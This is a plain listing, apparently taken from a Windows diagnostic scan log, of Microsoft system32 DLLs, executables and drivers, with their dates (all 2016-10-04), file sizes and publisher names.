2016-10-04 01:16 - 2016-10-04 01:16 - 01384704 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01344992 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01344000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01276608 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01144600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01110016 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01098752 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01056768 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01015648 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00941568 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00920576 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00894976 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00834128 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00823808 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00822272 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00781664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00705536 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00702416 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00626688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00623616 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00614752 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVClient.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00582144 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00581672 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00580096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00564488 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00550240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogs.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00500736 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00498016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00494592 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00491008 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00484544 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00470368 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00461312 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00448864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00432328 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00413184 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00399712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00399360 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00378368 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00357216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00356704 _____ (Microsoft Corporation) C:\WINDOWS\system32\halmacpi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00356704 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00353792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00342368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicesFlowBroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00320152 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00315736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00297552 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00260448 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Phoneutil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2016-10-04 01:16 - 2016-10-04 01:16 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00246784 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00244224 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00225280 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL
2016-10-04 01:16 - 2016-10-04 01:16 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovhost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00186720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00170448 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00162850 _____ C:\WINDOWS\system32\C_932.NLS
2016-10-04 01:16 - 2016-10-04 01:16 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BcastDVRHelper.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00151040 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00141824 _____ (Windows ® Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00127168 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00125792 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00116224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00110080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft-Windows-MapControls.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wificonnapi.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MediaFoundation.DefaultPerceptionProvider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00094560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\AppVStrm.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00094528 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00093984 _____ (Microsoft Corporation) C:\WINDOWS\system32\phoneactivate.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\olepro32.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00089600 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsCSP.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosStorage.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshost.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosHostClient.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\findnetprinters.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00054784 _____ (Microsoft Corporation) C:\WINDOWS\system32\AddressParser.dll
2016-10-04 01:16 - 2016-10-04 01:16 - 00054624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-10-04 01:16 - 2016-10-04 01:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2016-10-04 01:16 - 2016-10-04 01:16 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll
